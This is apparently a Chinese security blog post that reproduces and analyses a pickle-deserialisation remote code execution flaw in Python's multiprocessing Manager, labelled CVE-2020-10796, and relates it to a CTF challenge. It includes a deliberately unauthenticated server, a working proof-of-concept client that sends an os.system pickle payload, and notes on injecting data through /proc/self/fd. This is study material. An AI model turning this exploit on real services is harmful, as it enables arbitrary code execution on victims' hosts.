CVE-2020-10796

漏洞描述

multiprocessing包是Python中的多进程管理包。其Manager类提供了一种创建共享数据的方法,从而可以在不同进程中共享,甚至可以通过网络跨机器共享数据。Manager维护一个用于管理共享对象的服务。其他进程可以通过代理访问这些共享对象。

此漏洞的成因为:multiprocessing模块中的Manager和ManagerBase的默认序列化参数是pickle,默认送恶意payload注入代码、触发此漏洞。成功利用此漏洞的攻击者可在受害主机上执行任意代码。 与主进程与子进程交互之间,利用pickle序列化进行信息传递,如果能在子进程进行时,能够恶意控制传入主进程的数据,即可传入恶意的pickle数据,造成pickle反序列化漏洞

漏洞复现

poc已公开
server.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from multiprocessing.managers import BaseManager

class Q():
pass

class QManager(BaseManager):
pass

if __name__ == '__main__':
q = Q()

def get_q():
return q

QManager.register('get_q', callable=get_q)

# 需要指定具体IP地址,不能为空字符串
m = QManager(address=('127.0.0.1', 8500), authkey=b'')

print("Server starting on 127.0.0.1:8500...")
print("Vulnerable to CVE-2020-10796 (pickle deserialization)")

s = m.get_server()
s.serve_forever()

poc.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import os
import io
import pickle
import socket
import struct
MESSAGE_LENGTH = 20
CHALLENGE = b'#CHALLENGE#'
WELCOME = b'#WELCOME#'
FAILURE = b'#FAILURE#'
def deliver_challenge(io, authkey):
import hmac
if not isinstance(authkey, bytes):
raise ValueError(
"Authkey must be bytes, not {0!s}".format(type(authkey)))
message = os.urandom(MESSAGE_LENGTH)
send_bytes(io, CHALLENGE + message)
digest = hmac.new(authkey, message, 'md5').digest()
response = recv_bytes(io, 256) # reject large message
if response == digest:
send_bytes(io, WELCOME)
else:
send_bytes(io, FAILURE)
# raise AuthenticationError('digest received was wrong')
def answer_challenge(io, authkey):
import hmac
if not isinstance(authkey, bytes):
raise ValueError(
"Authkey must be bytes, not {0!s}".format(type(authkey)))
message = recv_bytes(io, 256) # reject large message
assert message[:len(CHALLENGE)] == CHALLENGE, 'message = %r' % message
message = message[len(CHALLENGE):]
print(message)
digest = hmac.new(authkey, message, 'md5').digest()
print(digest)
send_bytes(io, digest)
response = recv_bytes(io, 256) # reject large message
if response != WELCOME:
# raise AuthenticationError('digest sent was rejected')
pass
def send_bytes(io, buf):
n = len(buf)
if n > 0x7fffffff:
pre_header = struct.pack("!i", -1)
header = struct.pack("!Q", n)
io.send(pre_header)
io.send(header)
io.send(buf)
else:
# For wire compatibility with 3.7 and lower
header = struct.pack("!i", n)
if n > 16384:
# The payload is large so Nagle's algorithm won't be triggered
# and we'd better avoid the cost of concatenation.
io.send(header)
io.send(buf)
else:
# Issue #20540: concatenate before sending, to avoid delays due
# to Nagle's algorithm on a TCP socket.
# Also note we want to avoid sending a 0-length buffer separately,
# to avoid "broken pipe" errors if the other end closed the pipe.
io.send(header + buf)
def recv_bytes(io, maxsize=None):
buf = io.recv(4)
size, = struct.unpack("!i", buf)
if size == -1:
buf = io.recv(8)
size, = struct.unpack("!Q", buf)
if maxsize is not None and size > maxsize:
return None
return io.recv(size)
# answer_challenge(c, authkey)
# deliver_challenge(c, authkey)
class POC():
def __reduce__(self):
print(1)
return (os.system,('echo "success" >> /home/sheep/suuuucccesss.txt',))
ip_port = ('127.0.0.1', 8500)
io = socket.socket()
io.connect(ip_port)
answer_challenge(io, b'')
deliver_challenge(io, b'')
poc = POC()
send_bytes(io, pickle.dumps(poc))



cool~,成功执行命令
服务端一定要注意加上

1
authkey=b''

否则执行不了

漏洞原理分析

官方文档理解multiprocessing库

Pool类

在这个库里面,通过建立Pool对象,然后调用它的 start()去生成进程池
实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None):
# Attributes initialized early to make sure that they exist in
# __del__() if __init__() raises an exception
self._pool = []
self._state = INIT

self._ctx = context or get_context()
self._setup_queues()
self._taskqueue = queue.SimpleQueue()
# The _change_notifier queue exist to wake up self._handle_workers()
# when the cache (self._cache) is empty or when there is a change in
# the _state variable of the thread that runs _handle_workers.
self._change_notifier = self._ctx.SimpleQueue()
self._cache = _PoolCache(notifier=self._change_notifier)
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs

if processes is None:
processes = os.cpu_count() or 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if maxtasksperchild is not None:
if not isinstance(maxtasksperchild, int) or maxtasksperchild <= 0:
raise ValueError("maxtasksperchild must be a positive int or None")

if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')

self._processes = processes
try:
self._repopulate_pool()
except Exception:
for p in self._pool:
if p.exitcode is None:
p.terminate()
for p in self._pool:
p.join()
raise

sentinels = self._get_sentinels()

self._worker_handler = threading.Thread(
target=Pool._handle_workers,
args=(self._cache, self._taskqueue, self._ctx, self.Process,
self._processes, self._pool, self._inqueue, self._outqueue,
self._initializer, self._initargs, self._maxtasksperchild,
self._wrap_exception, sentinels, self._change_notifier)
)
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()


self._task_handler = threading.Thread(
target=Pool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache)
)
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()

self._result_handler = threading.Thread(
target=Pool._handle_results,
args=(self._outqueue, self._quick_get, self._cache)
)
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()

self._terminate = util.Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._change_notifier, self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15
)
self._state = RUN

关键我们跟进源码的map函数,看它都做了什么

1
return self._map_async(func, iterable, mapstar, chunksize).get()

继续跟进

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
self._check_running()
if not hasattr(iterable, '__len__'):
iterable = list(iterable)

if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0

task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put(
(
self._guarded_task_generation(result._job,
mapper,
task_batches),
None
)
)
return result

主要关注一下_guarded_task_generation函数,跟进实现

1
2
3
4
5
6
7
def _guarded_task_generation(self, result_job, func, iterable):
try:
i = -1
for i, x in enumerate(iterable):
yield (result_job, i, func, (x,), {})
except Exception as e:
yield (result_job, i+1, _helper_reraises_exception, (e,), {})

核心目的:把 iterable 中的每一项 打包成任务元组,供 worker 执行。
把任务放入 self._taskqueue(父进程内部线程队列)
然后跟进函数实现
主要是两个主要的
Pool._handle_tasks
Pool._handle_results

第一个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
def _handle_tasks(taskqueue, put, outqueue, pool, cache):
thread = threading.current_thread()

for taskseq, set_length in iter(taskqueue.get, None):
task = None
try:
# iterating taskseq cannot fail
for task in taskseq:
if thread._state != RUN:
util.debug('task handler found thread._state != RUN')
break
try:
put(task)
except Exception as e:
job, idx = task[:2]
try:
cache[job]._set(idx, (False, e))
except KeyError:
pass
else:
if set_length:
util.debug('doing set_length()')
idx = task[1] if task else -1
set_length(idx + 1)
continue
break
finally:
task = taskseq = job = None
else:
util.debug('task handler got sentinel')

try:
# tell result handler to finish when cache is empty
util.debug('task handler sending sentinel to result handler')
outqueue.put(None)

# tell workers there is no more work
util.debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except OSError:
util.debug('task handler got OSError when sending sentinels')

util.debug('task handler exiting')

这个put方法是我们传入的,实现在这里

1
2
3
4
5
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv

这个队列底层是 管道 (pipe) 实现的,所以它最终还是对应文件描述符(fd)
而这个send方法,就是把对象进行序列化进行写入,recv方法就是把对象反序列化进行读取

1
2
返回的两个连接对象 Pipe() 表示管道的两端。每个连接对象都有 send() 和 recv() 方法(相互之间的)。请注意,如果两个进程(或线程)同时尝试读取或写入管道的 同一 端,则管道中的数据可能会损坏。当然,在不同进程中同时使用管道的不同端的情况下不存在损坏的风险。
send() 方法将序列化对象而 recv() 将重新创建对象。

然后我们看第二个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
def _handle_results(outqueue, get, cache):
thread = threading.current_thread()

while 1:
try:
task = get()
except (OSError, EOFError):
util.debug('result handler got EOFError/OSError -- exiting')
return

if thread._state != RUN:
assert thread._state == TERMINATE, "Thread not in TERMINATE"
util.debug('result handler found thread._state=TERMINATE')
break

if task is None:
util.debug('result handler got sentinel')
break

job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None

while cache and thread._state != TERMINATE:
try:
task = get()
except (OSError, EOFError):
util.debug('result handler got EOFError/OSError -- exiting')
return

if task is None:
util.debug('result handler ignoring extra sentinel')
continue
job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None

if hasattr(outqueue, '_reader'):
util.debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (OSError, EOFError):
pass

util.debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), thread._state)

同上,父进程进行写入读取
还有一个函数

1
2
3
4
5
while True:
task = inqueue.get() # 从 pipe/fd 读取任务(序列化 pickle 数据)
if task is None: break
result = func(*task[3]) # 执行 convert_image
outqueue.put((index, result)) # 结果序列化回 fd

即子进程的相关读取发送操作

重点理解

一般来讲,我们通过map方法将对象放进主进程队列,然后经过

1
主进程将对象pickle序列化->主进程的写入端(fd)->子进程从父进程的写入端读取->反序列化执行->序列化写入父进程的读取端

而fd是通过os.pipe()创建的
一般这个过程没有问题,不存在漏洞
但是如果在子进程的时候,我们可以实现覆盖文件或者向/proc/self/fd/x写入数据的时候,主进程直接读取进行反序列化,就会存在漏洞
但是有一点需要注意,使用write是无法写入的
如那道Hitcon的题就是如此
实际路径的确定有点猜的意味()
本地起docker的话可以看pid对应查fd
ls -al /proc/7/fd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def list_fds_brief(label):
"""打印 /proc/self/fd 的简要列表(fd -> target)"""
pid = os.getpid()
print(f"\n---- {label} (pid={pid}) ----")
try:
fds = sorted(os.listdir('/proc/self/fd'), key=lambda x: int(x))
except Exception as e:
print("Cannot list /proc/self/fd:", e)
return
for fd in fds:
try:
target = os.readlink(f'/proc/self/fd/{fd}')
except Exception as e:
target = f"<err:{e}>"
print(f"fd {fd:>2} -> {target}")
print("---- end ----\n")


有意思的是,对这个CVE理解加深,重心得看向Image.save方法了,更底层?还有哪些更底层的函数呢?
除了这个问题,分析poc的实现形式
不过本次更多关注CVE,就点到为止了

后记

花了几乎半天的时间想出一道类似的题目,发现实际根本反序列化不了,看logs也没进要key的时候,百思不得其解的时候,不断给代码减负,问题还是存在,最后发现因为自己单单想考cve,又天真认为本质上就是把文件覆盖进文件描述符就行了,用的open,但是实际不成功,才发现,得用更为底层的img.save
比如

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Process ForkPoolWorker-2:
Traceback (most recent call last):
File "/usr/local/lib/python3.13/multiprocessing/process.py", line 313, in _bootstrap
self.run()
~~~~~~~~^^
File "/usr/local/lib/python3.13/multiprocessing/process.py", line 108, in run
self._target(*self._args, **self._kwargs)
~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.13/multiprocessing/pool.py", line 114, in worker
task = get()
File "/usr/local/lib/python3.13/multiprocessing/queues.py", line 387, in get
return _ForkingPickler.loads(res)
~~~~~~~~~~~~~~~~~~~~~^^^^^
_pickle.UnpicklingError: invalid load key, '\x00'.

说明反序列化成功~
基本试成功的fd都是6或者10,不行重开环境试都行,本来有点看运的,不过确实是能弹